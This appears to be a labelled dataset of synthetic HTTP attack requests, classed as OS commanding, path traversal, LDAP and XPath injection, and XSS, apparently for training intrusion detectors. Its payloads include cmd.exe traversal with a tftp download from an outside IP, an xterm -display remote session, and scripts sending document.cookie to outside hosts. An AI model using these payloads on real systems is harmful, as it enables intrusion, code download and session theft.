UA-Pixels: 127x111
Via: ao4d8z/0.3 www.Fpodoa6.htm, 0.7 102.52.140.200, byeheb/8.3 39.125.50.193:9139
Transfer-Encoding: compress
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44329
Start - Id: 44395
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: 180.246.236.120
Connection: keep-alive
Accept: image/png;q=0.4
Accept-Charset: windows-1253, x-mac-cyrillic;q=0.0, x-mac-turkish;q=0.6
Accept-Encoding: gzip, deflate, compress;q=0.3, deflate;q=0.6, compress;q=0.1
Accept-Language: cIOfetmo-ah0itng, ahbxo-GtPnee4, ecetteo-beTprSnn, ti5-Txtw
Cache-Control: 3syoo=ol
Client-ip: 11.102.57.129
Cookie: r4eessnsr=oeuhsiTs;esboageojd=038928
Cookie2: $Version="30"
Date: Fri, 01 Jun 07 19:23:04 CET
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Tue, 13 Oct 09 09:58:39 UTC
If-Unmodified-Since: Fri, 04 Dec 09 17:53:33 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.5
Pragma: tHp68='Ns'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: rtrc iusenooo=galrlc
Range: 3952-044,25518-
Referer: /reaowwnl/6yhtso.dll
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.3 (compatible; Konqueror/3.2; Win 9x; nmeafn)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: FTP/0.4 51.238.195.225, HTTP/3.9 www.ye49h.html:103, e4y/1.8 www.te5goeoe.tiff
Transfer-Encoding: ofhjt
Upgrade: asneah/1.8, akhg/1.6
Warning: 345 www.zdydE.js:508 "oogntaebhaEnWh" "Sat, 14 Oct 06 08:34:42 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44395
Start - Id: 42896
class: OsCommanding
GET /5Nhoas/oa3poM/mKI7/ty/tyeiXw2jk3i/ayso4/eXs1bjhZ67NNF/raentrwb9/lKFAk00uOKq11HMss6y/yu5oa/-C80ORvujM8BM.mdb?dtsexl=6389&om9feD=%7C+dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C&lItmHstsT=4%3E&geihi=757024190&ogyaSrdleeooc=8lc&sccnoioo4eow4he=hz-and&n9lly=447&a5nt=96755&astaIs=%5Btcad&7dpa0uj=ustmpAME%3Bmco%29r%27ohttpsv8&mrpraaIne=thandiiosapcAx&a9tioastsw6ed=script%24%3A1ciHe%25ygcat HTTP/1.1
Host: www.tgBreifHte.cz:469
Connection: close
Accept: video/mpeg, audio/basic;q=0.4, application/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=29
Client-ip: 140.122.123.100
Cookie2: $Version="7"
Date: Mon, 27 Apr 09 04:44:28 UTC
ETag: "k9w8BVzKj5xSUfP6tQT"
Expect: torrt
From: 9r5eS@ryrh.be
If-Match: *
If-None-Match: *
Max-Forwards: 648
Pragma: fsfzrgt='CasyZe'
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: NTLM aXJkZWR2eGh3ZG9yVW55b2VhYXNpbm5wMkhodGVucWlrcWppYXNtZXNq
Referer: /7onnhrh/2sgaqu9.nsf
TE: trailers,trailers,trailers
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 3.6; Tn-od; rv:0.6.8) Gecko/15360017
Via: 7.3 www.wdgAsi.js, 9.5 32.49.91.171
Transfer-Encoding: identity
----: ----------------------------------

null

End - Id: 42896
Start - Id: 38709
class: LdapInjection
GET /mcV7r/s2k/dc4C/6@b34PBcmd1YPJhN/qYbKkx.Mm4k6Wc5nrCf/jhLbN1IOc3f/omWZdI/83sh/QtzPIxp_Mmj4Id/7veRz6@dOlQV0MY/eEathtiyljLac.html?rrb6p=%29+%28++++%7C++%28+cn%3D*o%27brien*++++%29%28mail++++%3D*o+++%27brien*++++%29+++&2i9WX=Flar%3Eowi%7C&eirLjrha4t=4838112&yU=hopadmintklglaro&naetibobRalaesw=5&r@e0d=3056325&1soDggsipu=stuuiahrtore HTTP/1.1
Host: www.nhisG3.net:8
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.6, gzip;q=0.0, compress
Accept-Language: ost-speaiE;q=0.0, bdaom-b5et;q=0.4
Cache-Control: min-fresh=560
Client-ip: 176.79.6.203
Cookie: ce0jTusejelthA=tll0rSlto9i
Cookie2: $Version="4"
Date: Sat, 12 Sep 09 15:39:24 GMT
ETag: "W_VEAUp25OqZ2HNn5Hk"
Expect: rsracoa
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 19 Mar 07 01:53:34 CET
If-Unmodified-Since: Sat, 18 Feb 06 20:47:00 CET
If-Match: *
If-None-Match: "0pxAnPtJkDnriZ4S3OB"
If-Range: Tue, 14 Aug 07 21:30:57 CET
Max-Forwards: 1300
MIME-Version: 6.8
Pragma: pre='4'
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: /a1ge/ixei4sse/o73mrjrm.msf
TE: trailers
Trailer: If-Modified-Since
User-Agent: 7NBP3CbGX http://www.gfqe.de
UA-CPU: PowerPC
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: FTP/7.0 www.zoon.css
Transfer-Encoding: gzip
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38709
Start - Id: 36203
class: PathTransversal
PUT /v7vLmDal0/mBKgGp_ImthgmrzW6Lz.htm? HTTP/1.1
Content-Length: 105
Content-Language: savs
Content-Encoding: compress
Content-Location: /IihESX/iteEl.mpeg
Content-MD5: dGVodHVlVGVoaWhlcmlsaQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 22 Mar 07 04:53:49 UTC
Host: www.3ctt102Cnr.org
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: utf-7;q=0.0
Accept-Language: *
Cookie: asthtwmkcebi=nByxTNjl_z;niqb=nlp;an2Sfev=11;Bx8yXh=cbdKlike ;vegeehine=/../../../../../../../Inetpub/iissamples/meiearer/ersean/laelmaveli/geisalicli.php4
Date: Tue, 11 Aug 09 18:07:00 UTC
Max-Forwards: 9744
Pragma: wnbhisy='inahe'
Referer: http://www.ui9pw.com/cutsMs/rl8tfpI.mp3
TE: deflate,trailers
User-Agent: Mozilla/4.8 (Windows; U; WinNT 5.2; pm-oi; rv:8.3.1) Gecko/28680930
Transfer-Encoding: sttasq

e5wcae=1K6crhTgroup byo&aT7seRzc=@e&3leKRE7Ae9s=yWcB8jog@LV&BKon5imuw=zG@f&ftNebirRNa=r8d&pId=88051

End - Id: 36203
Start - Id: 44737
class: PathTransversal
GET /yDQWvI./hcPjvrNcM8_IBMlO@gFw/RcGVt_lb8Xv3b2T/rurfbz/ntsouWjaRb.bin?Midntw=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml HTTP/1.1
Host: 130.132.221.175:4
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: cp-932;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 11.50.154.165
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="152"
Date: Tue, 04 May 04 05:20:57 GMT
ETag: W/"8eZbE3_gg.yh1QJzRL"
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Sun, 11 Feb 07 22:23:30 CET
If-Match: *
If-None-Match: "VxHNZ7flcuA-i9-T.a"
If-Range: Sat, 23 Jan 10 17:48:31 CET
Max-Forwards: 6124
MIME-Version: 0.1
Pragma: no-cache
Authorization: Basic dGJvZTlkOmZhNmE=
Range: 218-,38304-
Referer: /RtsrBeh/hhaemi.pl
Trailer: TE
User-Agent: tiuNrisnpiin
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44737
Start - Id: 48926
class: XPathInjection
GET /oRUfUYfuuXMd2WaM7m/tFbU8r/hD.GsbyAYX0..jpeg?btEeMa=gBtQgXTWWwo3&efer=910+or++onni%2Fseei%2Fb%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D++or+++9771%3D&Zdrop6YL=tidmt%29na&tjornhjzbcsoda=nzrp&attYnses=n6uazevalsrre HTTP/1.0
Host: 103.28.184.166
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: gzip
Accept-Language: tamic-E;q=0.2
Cache-Control: no-cache
Client-ip: 215.230.101.177
Cookie: Rrrwaeldnstt=8c;uoI=midsBi;vioee=t a;tyvhi=coS2;vUgK0=rhavingm3l]ldluyocat@-egroup byds
Cookie2: $Version="7"
Date: Fri, 14 Apr 06 11:02:26 GMT
ETag: W/"Rgf_hh80cxySShP0crvb"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Tue, 25 Jan 05 05:11:28 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "AtDXj-Bjn46i1RJyMG"
If-Range: Wed, 24 May 06 02:18:18 UTC
Max-Forwards: 8
MIME-Version: 7.0
Pragma: zdrXrci='sas6'
Proxy-Authorization: NTLM bmx2cmlpZmV0Ym1zdGg5b2xpYWRucmN2dGM4aTNlbm1lRVVoYg==
Authorization: a1piir ioAaEfh=ckslot
Range: 1264-
Referer: http://302nir.gov/sgn9in/5nsper/pt5oc.css
TE: gzip
Trailer: Host
User-Agent: reaseh1at2s2eel
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: 1.5 www.enieif2.htm, 8.1 www.u6tcwi.jpeg
Transfer-Encoding: identity
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 4208976972
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48926
Start - Id: 43093
class: OsCommanding
GET /etcMgCyDLz/cvg5y-hrumpFpgHRMnH/yrdiOeajet9ge/aSTAa/d1/us8nRier2le4e/i6T9L/tTsist2wre/hBB9.jpg?yxdfoYxhm=shutdownne&iUbei=d%5CToalrftlI&hihbhofedi=shutdownviadhdbf+&irearbs=ioit74aOitiziem&ll1vnlte=O%2F%3D3%2B4s&b5Dz8rTg44=55392071&qmmhicatr=tJz9P.mn&Tnzvreeg=ltgeegdni&ve8Tvelec=%5Cr+++xterm+++++-display++++19.112.4.210%3A0.0&ciitmdnhTt=tCs&cgdI40vbscriptC=iG6AKK0. HTTP/1.1
Host: www.toNemri.org
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-ahsil;q=0.6, Tlnn-euCzh;q=0.6, ehQheLke-h4rnyNa
Cache-Control: only-if-cached
Client-ip: 115.146.109.73
Cookie: giblArhete=18;ssetsi=822621;qfacniesrimjsg=stoes1'n\ore4yp;diebcit=oaRhiuwqisa;iuattydqe6rT=[ n1Ig
Cookie2: $Version="41"
Date: Mon, 08 Jan 07 06:50:07 GMT
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Modified-Since: Mon, 09 Jan 06 20:32:24 CET
If-Unmodified-Since: Tue, 18 Apr 06 19:01:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7645
MIME-Version: 1.3
Pragma: ient='i7'
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /s9nri/Mtdmflae/ry3A/sesl3.jpg
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 5.1; bw-cf; rv:6.1.5) Gecko/46420867
UA-OS: Mac OS X
Via: HTTP/2.1 www.5sonfb.png, FTP/8.3 188.35.128.161
Transfer-Encoding: identity
Upgrade: Fese/9.7, uSe/3.6, alh/3.9
Warning: 212 www.htenLWg.shtml:97715 "ednatrortnk4" "Wed, 22 Apr 09 12:47:41 UTC"
X-Serial-Number: 306986025864028
----: ------------------------------------------------

null

End - Id: 43093
Start - Id: 46806
class: XSS
PUT /BHuEmvhnKLYlib/o8YlqIT5FsKGMauRmb/RT/m_xZZb-UNv1lyZ/hdbf.Y2IgDeOtt/aKMQ/lhTto/cX1VFYM8dnRzRX5F.asmx? HTTP/1.1
Content-Length: 315
Content-Language: hoemrn
Content-Encoding: gzip
Content-Location: /oqntMO.sh
Content-MD5: bGV1YXllcWhuanJhaXg0bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Jul 07 02:05:24 GMT
Last-Modified: Wed, 21 Dec 05 20:04:04 GMT
Host: 149.100.18.90
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: qeh-sdp;q=0.7, la0esc-zer;q=0.2
Cache-Control: max-stale
Client-ip: 163.182.220.152
Cookie: samopenls6Kbinzi=vHueqLhT;Raetkice=e-7fGi;it6e=n1s4ubll
Cookie2: $Version="3"
Date: Sun, 18 Apr 04 20:00:13 UTC
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: crttsci=ei2cr
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Thu, 26 Apr 07 05:26:55 UTC
If-Unmodified-Since: Fri, 17 Apr 09 21:19:28 GMT
If-Match: "MEGrXqwucpum@xi9idO5"
If-None-Match: *
If-Range: Mon, 30 Oct 06 24:51:56 UTC
Max-Forwards: 8
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: Basic NFZzTnl2Om5vb2Q=
Range: 15-86
Referer: /dkenshe/hgievte.tar
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: einr/5.6.8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: nhPr; u3bs2aRe=daOe
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rorhcn0rioils=32978&tt=dbleve5hls&.U3E0atmpservicesOw=394409742&xefdmoodtatexp=4&ain=aL&ts1dIaGp=erco&rOFtHueznxrb=&<script >[window.open('http://20.95.247.41/veonng.php4'+document.cookie);]</script  >&aeENa52ixh=~sobjecttnEtuaupdatedMs1pnit&ep=4263850&elrjbi0ntIess=e&ide3=221

End - Id: 46806
Start - Id: 44584
class: OsCommanding
GET /eOTznat/hOjUpWByo0/4j_5@3ohmBJi..jpg?cn=ibat&DDYsystem-ZQe0=i+8m5+c%28%2Faccess_logtmcata&eawyssmhNch8=snneelS&whdji86s=rstilf&El4aSIt=1.213.155.23+%3B++tftp+192.168.10.33+test.txt&iOseAzIlsaa=rnshtaccesr&eHVC=opeESanegstynQ&adminLfBK=05&gvYK0imgCa=oeuhfe HTTP/1.1
Host: 223.49.157.169
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Thu, 15 May 08 20:08:47 UTC
ETag: W/"wGdDKS5AiuXyrtwMN2s"
Expect: l5ocdtw=ot2rhq
From: fn96a@esnteln.biz
If-Modified-Since: Sun, 16 Nov 08 19:17:53 UTC
If-Unmodified-Since: Wed, 23 Apr 08 17:01:04 UTC
If-Match: "QytJcDmlsTYW0IRtI"
If-None-Match: "KnG8qrBG4GTZx2j24AOA"
If-Range: Sun, 14 Mar 10 01:15:04 UTC
Max-Forwards: 5114
MIME-Version: 0.9
Pragma: tcTa='pvqn5p'
Proxy-Authorization: Basic YXNkdUdTOnVzZTcz
Authorization: NTLM a2J1cmgzMWhpZW9ubm55aGlCZ2xuZWluanJzQm9zZW5SYXNpYWlwNWVMczBu
Range: 746-,-10102
Referer: http://uhtnasx.net/moNmo/auOeboc.sh
TE: trailers,trailers,chunked
Trailer: Accept-Encoding
User-Agent: ryLaje (cSZIvWva; hdmG5Mv7fJ; hAs..N6J)
UA-Color: color32
Via: HTTP/7.1 www.anelAe.jpeg, hguugm/0.1 www.twetRteu.png, HTTP/0.2 www.eryh.htm
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
Warning: 011 65.177.109.164 "rqtrCd" "Sun, 13 Nov 05 17:42:15 UTC"
X-Forwarded-For: 84.212.52.145
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44584
Start - Id: 36509
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 10.204.100.125:945
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 138.104.69.2
Cookie: shbeh=eaani/I52nes~a;YMCeLcmd=lst@rtesconnectoitfre;outsuelcoh9=HnaRdH]yv;e]uecs6
Cookie2: $Version="048"
Date: Mon, 21 Aug 06 21:01:28 GMT
ETag: W/"XSBTdwWVG7jW_uARV"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Tue, 23 Aug 05 18:29:13 CET
If-Match: *
If-None-Match: "f0hZINOGhvietrIWvi"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM NzdyNnRvcmFiYTJhdHNvZGxheG5tbmVzb2ltbmtpaUV4dXhvcmFpcw==
Range: 7303-,26337-
Referer: /dt9tgndb/sghiu/saft.tiff
TE: trailers,deflate,deflate;q=0.4
Trailer: From
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 0.6; ae-es; rv:8.6.3) Gecko/09216206
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/6.6 www.mi6n6.jpg, HTTP/4.1 129.14.130.80
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36509
Start - Id: 48902
class: XPathInjection
GET /ooyM9hWxgvrNxf6CGe-g/tJga63WT9I/evnKmsw/zd/wfcufnReDite8cio/hu_ts3x@iD.k/anszGlHruGJaYmfpnH/c_Wr/8hsOosrtbtmq/nh0snzDhnedcnjhao/g-tneh/5VMhHlF.0S06jiHCI5qg.shtml?siloy=ishieoechwnrfedT&wgfa=ts%28ee&goa4gprmwtatHnh=braim0tpgmelee&1atiaeewt1=cHn7yw&errAxi=0&sinputMDzI=d+yyg&ldcreplacegpSiframeCMZv=nQiyJGzbA1A&tiWFa2PwAe=17&rossEyna6dbs=nh%25jdiv2lhte&4oia72Dcao=sASkn&toktxc6osb=heH%27+or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++%27e2%27+%3D+%27&ftib=o5e&.nmnQB09z=%7Ce&Q.OgREoMochild=taLioi HTTP/1.0
Host: 37.105.123.234
Connection: close
Accept: */*;q=0.5
Accept-Charset: euc-cn;q=0.1, iso-8859-9, koi8-r;q=0.6, windows-874;q=0.1, cp-936;q=0.3
Accept-Encoding: deflate, gzip, compress;q=0.9, identity;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 6.234.29.204
Cookie: oT=eetncIo
Cookie2: $Version="0"
Date: Mon, 31 Jul 06 12:26:50 CET
ETag: "EZ.0JafyIzHcH8cl0G1T"
Expect: sbtnm
From: nui8@hgERemx.net
If-Modified-Since: Sat, 03 Jun 06 15:17:23 GMT
If-Unmodified-Since: Wed, 17 Oct 07 24:09:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 85
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest username="hatewte"
Authorization: Basic Y3VpSmR4dW06aWhocg==
Range: 87-22
Referer: /gtpe/ii5conla/iisxhs.jpg
TE: gzip;q=0.7
Trailer: Warning
User-Agent: gyernenlf
UA-CPU: MIPS
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 978x515
Via: 4.0 www.run6uEoh.html, 6.0 225.8.95.174, 6.6 220.88.128.160
Transfer-Encoding: compress
Upgrade: o6r/8.3, gsh/9.3, o8o/3.8, 2oIojh/2.5
Warning: 712 39.177.49.129 "e9wsavnreymOd" "Wed, 28 Jun 06 09:25:28 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 58510218762
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48902
Start - Id: 36575
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: 1.220.30.206
Connection: dhiset
Accept: text/xml;q=0.6
Accept-Charset: euc-tw
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=12404
Client-ip: 216.64.166.207
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="5"
Date: Wed, 23 May 07 15:42:06 CET
ETag: W/"tdDcfOt@i5oqzz2"
Expect: eAdl7
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Nov 08 14:52:38 UTC
If-Unmodified-Since: Sun, 09 Aug 09 14:42:19 CET
If-Match: *
If-None-Match: "DOofAM4n6gcYEHEXwDH"
If-Range: "4JPZ-PcrArb1Gzp0jqi"
Max-Forwards: 2316
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic ZXdoY3A6Um5sc3I=
Range: -961935,910376-
Referer: /j1aafoeM.cfm
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/8.0 (compatible; MSIE 0.6; Unix; ms7saETe; brau5alae)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 186x739
Via: HTTP/0.0 www.aredjrc.tiff, 8.2 www.bxed.png, FTP/9.6 www.atenwi.png:5394
Transfer-Encoding: compress
Upgrade: t2w5X/9.8
Warning: 962 www.oRzm8.tiff "5ihoDfe" "Tue, 22 Mar 05 22:33:37 CET"
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 33496662681000
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36575
Start - Id: 44864
class: PathTransversal
GET /trloib5tilin2/owD12X6.VB-zCOUl/cu_7MLf2Ap9OeEdRaJ/NiOjy/psdenleE2ueep/gPUsX.cgi?imgbo-K@xZdW=tnpp&QVc@=8Ehto&EaEEtEgdis=thxoo8n&aaaeo1sslic=ra&6tbaI6ca=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&V60Nr4D6=n6H&qj8y3=1989&Rca=fng&1niaceenxleA=tui HTTP/1.0
Host: www.lowwl.fr:9
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-japanese;q=0.2, iso-8859-3
Accept-Encoding: *
Accept-Language: *
Cache-Control: hea=Dmsri
Client-ip: 31.199.198.5
Cookie: UimOtoYnIe=n1;Esct=98722;fpeioidrtTrrh=ce6cvarnywget;Ieawindow.open=shutdown+9rt
Cookie2: $Version="27"
Date: Mon, 20 Aug 07 11:38:20 GMT
ETag: "iFuMZlEgzkRH-Xd"
Expect: 100-continue
From: netotmi@oanhTettwr.cz
If-Modified-Since: Tue, 26 Jan 10 13:25:40 CET
If-Unmodified-Since: Sat, 09 Aug 08 23:07:53 CET
If-Match: "D.BUuhCfXTRmTZY"
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: *
Max-Forwards: 470
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: Basic bmdwbzpjc3RMbWU=
Range: 31868-
Referer: http://eRuj.org/klp5/Odpkmmac/5Rln/e0feuIt/nscdn.png
TE: trailers,gzip;q=0.7
Trailer: If-Modified-Since
User-Agent: Mozilla/9.9 (Windows; U; Win 9x 9.4; 0t-os; rv:7.1.9) Gecko/76358121
UA-CPU: PowerPC
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 1.3 www.pseesld.js
Transfer-Encoding: gzip
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44864
Start - Id: 47399
class: XSS
GET /EuNhV-@0m/Pinclude04m/o4eibhou1/eZZFZn/trYO1ArFXYD/shiNao/hSVBKLiTX9C7P/md.msf?talaua8tt8=ieuTlWF%3Eopen&2YZboot.iniYpositionyP-1S8=%3Cobject+++classid+%3D+%22+++++clsid%3A...+++++%22++++codebase+%3D+++%22javascript%3A+%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.la.com%2Fcgi-bin%2Ftotoetmall.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E HTTP/1.0
Host: 5.139.52.55
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp, x-mac-hebrew, gb2312;q=0.2, euc-kr;q=0.2, x-mac-korean;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: SlzaaDg-plfed
Cache-Control: no-store
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Wed, 31 Aug 05 21:56:34 GMT
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: "DGEqqFou1F_O41rZkQ"
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 257
MIME-Version: 0.3
Pragma: Rieev='ra'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: /eriwo/edic.mpeg
TE: trailers,deflate;q=0.2
Trailer: Range
User-Agent: 1Tby91zi1 http://www.teBetuiu.de
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: 7.6 www.e21Xtprc.js, FTP/2.8 www.mTrw.shtml
Transfer-Encoding: idune
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 805 www.etFooy.png "eaacsEipcsy" "Tue, 21 Sep 04 14:03:42 CET"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47399
Start - Id: 50109
class: XPathInjection
PUT /od6Gmte1ite/lkA5MpA-eoITyNRl9d/ns/8f/TFZ1siV/tq0b-P2l5Urv_-odsT8.css? HTTP/1.1
Content-Length: 59
Content-Language: iSmi
Content-Encoding: compress
Content-Location: /nhe4cS/oepieNtt/BwnoiSo/hitsi8ao/tAaeeeia.png
Content-MD5: bGlvbEFkbXRGMm9objNldA==
Content-Type: application/x-www-form-urlencoded
